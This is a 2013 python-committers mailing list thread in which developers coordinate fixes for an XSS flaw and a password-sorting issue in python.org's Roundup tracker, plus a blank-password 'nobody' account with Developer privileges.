Hi, On Mon, Jul 15, 2013 at 2:08 PM, R. David Murray <rdmur...@bitdance.com> wrote: > On Mon, 15 Jul 2013 11:09:08 +0300, Michael Foord <mich...@voidspace.org.uk> > wrote: >> >> On 15 Jul 2013, at 11:05, "M.-A. Lemburg" <m...@python.org> wrote: >> >> > Who would be the one to contact for issues like these ? >> > >> > The case is rather urgent, since the XSS can be used for stealing >> > session cookies on *.python.org. >> > >> > The sorting by password issue is a more obscure one. Just removing >> > the "feature" to sort by password should be enough to solve it. >> >> Technically it's an infrastructure issue (cc'd), but fixing the code of >> roundup is hardly their domain. >> >> Ezio Melotti (cc'd) did a lot of work on the Python installation of roundup, >> so he may have a better idea. >> >> We have a security mailing list but that is mainly intended for security >> issues in the language: >> >> secur...@python.org <secur...@python.org> > > The OP also emailed security (which I heard about via IRC, I'm not > on that list). > > Ezio is a Roundup developer, so he is indeed the best person to look > at the XSS issue, since it is a Roundup problem and not specific to > the Tracker. I can take a look too but he is more knowledgeable > than I about roundup itself. >
I don't have time to look at this now, and it might take up to 2 weeks before I find some time. The fix is usually as simple as adding a call to escape() in the right spot, but finding the right spot and testing that the fix works might take some time. Before doing this, our Roundup instance should be updated (1.5.0 has been released recently, but AFAIK it doesn't included a fix for this). FTR the issue has been reported upstream at <http://issues.roundup-tracker.org/issue2550817>. Best Regards, Ezio Melotti > There is another problem which is specific to our tracker and which is the > bigger issue right at the moment. We have a 'nobody' user with a blank > password and Developer privileges. > > I'm about to go out, so I don't want to make a change that might break > something right this moment, but anyone with the Coordinator role > could take this on if they want to do it right now: remove either the > Developer role, or both roles, from that user and see what happens. > I suspect that user should not exist at all, but I don't know for sure. > > --David _______________________________________________ python-committers mailing list python-committers@python.org http://mail.python.org/mailman/listinfo/python-committers
